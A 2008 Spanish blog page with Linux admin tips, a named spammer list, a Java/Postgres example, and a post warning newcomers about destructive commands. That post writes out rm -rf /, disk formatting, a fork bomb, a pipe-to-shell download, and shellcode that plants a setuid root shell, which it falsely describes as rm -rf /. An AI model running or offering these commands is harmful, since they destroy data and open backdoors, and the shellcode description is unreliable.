Malogey

Noviembre 24, 2008

Algo de administración en GNU/Linux

Archivado en: Linux — cmontedonico @ 8:27 pm
Tags:

Vamos a ver algunos comandos importantes para administrar sistemas GNU/Linux. Los comandos sirven siempre y cuando estes usando la cuenta de root.

$ tail -f /var/log/auth.log

Ese comando nos muestra  a los usuarios que se acaban de autenticar como root y los que están activos también, por lo que deberemos vernos nosotros en esa lista.

$ useradd malogey

Crea un usuario nuevo dentro de nuestro sistema. El archivo /etc/login.defs define los parametros por defecto que tendrá ese usuario. El directorio importante es el /etc/skel/ que define donde se creara el $HOME del nuevo usuario.

$ passwd malogey

Vamos a cambiar la contraseña de nuestro usuario. Contiene opciones muy útiles como
–mindays (-n número minimo de días para cambiar contraseña);
–maxdays ( -x número máximo de días para cambiar contraseña);
–warndays (-w número de días para cambiar tu contraseña).

$ sudo comando

El comando sudo nos va a dar permisos temporales de root, por lo que es importante saber su configuración en el archivo /etc/sudoers que es donde el poder se crea. Tenemos algunos ejemplos simples y bastante útiles.

root ALL=(ALL) ALL    //Le da permisos de hacer lo que sea al root
malogey ALL=(ALL) ALL  //Le da permisos de hacer lo que sea al usuario malogey
%sudo ALL=NOPASSWD: ALL  //Los usuarios no necesitan una contraseña para usar el SUDO
%users ALL=/sbin/ifconfig  //Todos los usuarios tendrán permiso de ejecutar el ifconfig
%group ALL=/sbin/useradd  //Todo un grupo podrá crear usuarios con el comando useradd

Algunos permisos pueden cambiarse únicamente con el archivo /etc/sudoers

El archivo /etc/security/limits.conf nos va a servir para definir los recursos que utilizan nuestros usuarios.
Viene separado por espacios en blanco y son 4 campos importantes

<domain>      <type>  <item>         <value>
@users            hard       data               50000
@users            hard       nproc             50
@users            hard       rss                 5000

Definen que: Los usuarios tienen un limite para crear archivos del tamaño de 50000 Kb. Los usuarios pueden tener máximo 50 procesos corriendo. Los usuarios tendrán 5000 Kb de memoria para usar.

Comercial de Linux por IBM

Archivado en: Diversion, Linux — cmontedonico @ 8:04 am
Tags:

Un comecial viejo que sigue estando vigente creado por IBM.

Noviembre 23, 2008

Top Ten Spammers

Archivado en: Linux — cmontedonico @ 10:07 am
Tags:

Si hay algo que es bastante terrible es abrir el correo y encontrarse con que tienes 20 correos de tipo basura, y más importante es saber que NO debemos abrirlos o darles clic en los enlaces, porque hacemos ricos a ciertas personas llamadas spammers. Bueno, aquí la lista de los personajes que nos agobian con casi el 80% de los correos basura del mundo.

  1. HerbalKing - India : Spam via botnet; distribuye farmacos y pornografia
  2. Leo Kubayev - Rusia : Spam via botnet y un virus que lo infecta; Distribuye pornografía, software pirata y copia elementos de las farmaceuticas.
  3. Canadian Farmacy - Estados Unidos: Botnet enviando 10 millones de correos al día; Distribuye farmacos. Posiblemente su ubicación radica más en China y Europa.
  4. Vincent ChanHong Kong: Utiliza Botnets y lleva haciendolo muchos años; Igual que los anteriores su principal fuente son los farmacos.
  5. Alex Polyakov - Ucrania: Multiples botnets y programas de spam porno; Su utilidad está en la pornografía y el negocio de los farmacos junto a Kubayev y Yambo.
  6. Dark-MailerAustralia: Basado en Proxys y botnets de windows; Es causante de una gran cantidad del spam en el mundo.
  7. Peter SeveraRusia: Utiliza botnets; Aliado con otros spammer del mundo, distribuye cantidades muy grandes de spam por la red.
  8. Yambo FinancialsUcrania: Gusanos, botnets y otros metodos; Este grupo utiliza animales, niños, farmacos y pornografía. Se hace pasar por bancos ficticios y roba datos confidenciales.
  9. Rusian Ibragimov - Rusia: Script de CGI; Uno de los criminales más buscados e importantes del mundo informatico. Utiliza proxys y virus para infectar PC`s en toda la internet.
  10. Anton Gorodoy - Rusia: Uso de Banners; Promociona cigarrillos y farmacos. Su sitio de trabajo se encuentra en China.

Si vemos, la facilidad con la que se envian correos basura en el mundo es proporcional al grado de inconciencia que tiene cada usuario al no proteger su computadora como debe. Simple recomendación es tener un antivirus, un firewall, un limpiador de registros y otro sistema operativo decente :D … si saben a que me refiero.

Noviembre 21, 2008

7 Comandos Mortales para Linux

Archivado en: General, Linux — cmontedonico @ 6:36 pm
Tags:

Cuando se tiene un poco de idea sobre los comandos básicos en una terminal, pues es difícil caer, pero pensemos que todos los días aparecen nuevos usuarios de linux y no falta el chistoso que les da un comando para hacer algo en especial y resulta que es un comando mortal, por eso este articulo, para tratar de proteger a todos los nuevos de los usuarios chistosos o maliciosos.

  1. $ rm -rf /

    Este comando borra de manera recursiva todo lo que se encuentra en el directorio root.

  2. $ char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Este es el codigo HEXADECIMAL del comando numero 1, así que tampoco lo intenten.

  3. $ mkfs.ext3 /dev/sda

    Este comando va a formatear el sistema de archivos que se encuentra en /dev/sda, que en este caso puede ser nuestro disco duro

  4. $ :( ){:|:&};:

    Este es una forkbomb. El proceso fork es la forma en que se crean los procesos, por lo que tu computadora comenzara a crear ejecutar procesos y se congelara.

  5. $ any_command > /dev/sda

    Este comando escribira los datos duros de la instruccion directamente sobre nuestro dispositivo.

  6. $ wget http://some_untrusted_source -O- | sh

    Este es más complejo, la parte de some_untrusted_source significa un sitio que no está verificiado y que puede ocasionar daño sobre nuestro sistema, por lo que nunca bajen algo de un sitio que no conocen.

  7. $ mv /home/yourhomedirectory/* /dev/null

    Este comando va a tirar todo nuestro directorio directamente a la basura, o mejor dicho, al limbo (aunque la iglesia ya desecho ese lugar de sus lugares favoritos). Es un lugar que no existe y que todos nuestros datos van a desaparecer.

Fuente:Deadly-linux-commands

Noviembre 20, 2008

Java y Postgres

Archivado en: Java, Linux — cmontedonico @ 6:15 pm
Tags: ,

Ahora tenemos el ejemplo de una conexion simple a la base de datos con Postgres usando Java, y bueno el codigo lo dejo aquí

import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.DriverManager;

public class conexion {
public static void main(String args[]) throws Exception {
Class.forName(“org.postgresql.Driver”);
String url = “jdbc:postgresql://localhost/automovil”;
Connection con = DriverManager.getConnection(url,”cesare”,”cesare”);
DatabaseMetaData dbmd = con.getMetaData();
System.out.print(“Database Product Name : “);
System.out.println(dbmd.getDatabaseProductName());
System.out.print(“Database Product Version : “);
System.out.println(dbmd.getDatabaseProductVersion());
System.out.print(“Driver Major Version : “);
System.out.println(dbmd.getDriverMajorVersion());
System.out.print(“Driver Minor Version : “);
System.out.println(dbmd.getDriverMinorVersion());
System.out.print(“Driver Name : “);
System.out.println(dbmd.getDriverName());
System.out.print(“Driver Version : “);
System.out.println(dbmd.getDriverVersion());
System.out.print(“JDBC URL : “);
System.out.println(dbmd.getURL());
System.out.print(“Supports Transactions : “);
System.out.println(dbmd.supportsTransactions());
System.out.print(“Default Transaction Isolation level : “);
System.out.println(dbmd.getDefaultTransactionIsolation());
System.out.print(“Uses Local Files : “);
System.out.println(dbmd.usesLocalFiles());

con.close();
}
}

Las 3 lineas en negritas son las importantes y aquí va la explicación.

Class.forName(“org.postgresql.Driver”); esta es la clase que se está usando en java para conectarse, y es necesaria que se escriba tal cual va aquí.

String url = “jdbc:postgresql://localhost/automovil”; Está linea define el controlador que usamos para conectarnos. Son 3 campos divididos por dos puntos. El primero es el controlador general, llamado JDBC. El segundo campo es el subprotocolo que en este caso es la base de datos a la que nos conectamos llamada postgresql. El tercer campo es la dirección de acceso a nuestra base de datos, con el localhost y la tabla llamada automovil.

Connection con = DriverManager.getConnection(url,”cesare”,”cesare”); Esta linea define una conexión con la base de datos y tiene 3 parametros, un URL que se definio en la instrucción anterior. Seguido del usuario y por ultimo campo el password. En mi caso y para el ejercicio, tengo creado un usuario llamado cesare y el password es igual.

Entradas siguientes »

Blog de WordPress.com.